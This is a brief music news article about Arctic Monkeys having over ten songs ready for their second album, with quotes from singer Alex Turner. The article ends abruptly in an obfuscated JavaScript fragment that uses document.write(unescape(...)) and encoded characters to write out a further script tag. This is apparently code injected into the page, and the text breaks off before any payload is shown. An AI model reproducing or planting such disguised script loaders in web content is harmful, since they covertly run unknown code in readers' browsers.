Arctic Monkeys have revealed that they have nearly written the follow-up to their debut 'Whatever People Say I Am, That's What I'm Not'.
The band are eager to head back into the studio to start work on the second album as they have ten new songs already penned.
"The second album will be different I think," singer Alex Turner said. "We've already got more than ten songs, because we've been writing for a long time. The last song that went on the (first) album - 'You Probably Couldn't See For The Lights But You Were Looking Straight At Me' - was written last May."
He continued: "So there are all the songs that we've written since then and they're all a bit different. I'll just be excited about getting back into the studio."
The singer also revealed that the band enjoy playing a few games with their success.
"I think we write great tunes and we ruffle feathers pretty well," he told Nuts. "I think, when you're in a position to do some feather ruffling, it's not always a bad thing. I don't know even why we do it - we just like being fucking naughty little boys sometimes."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22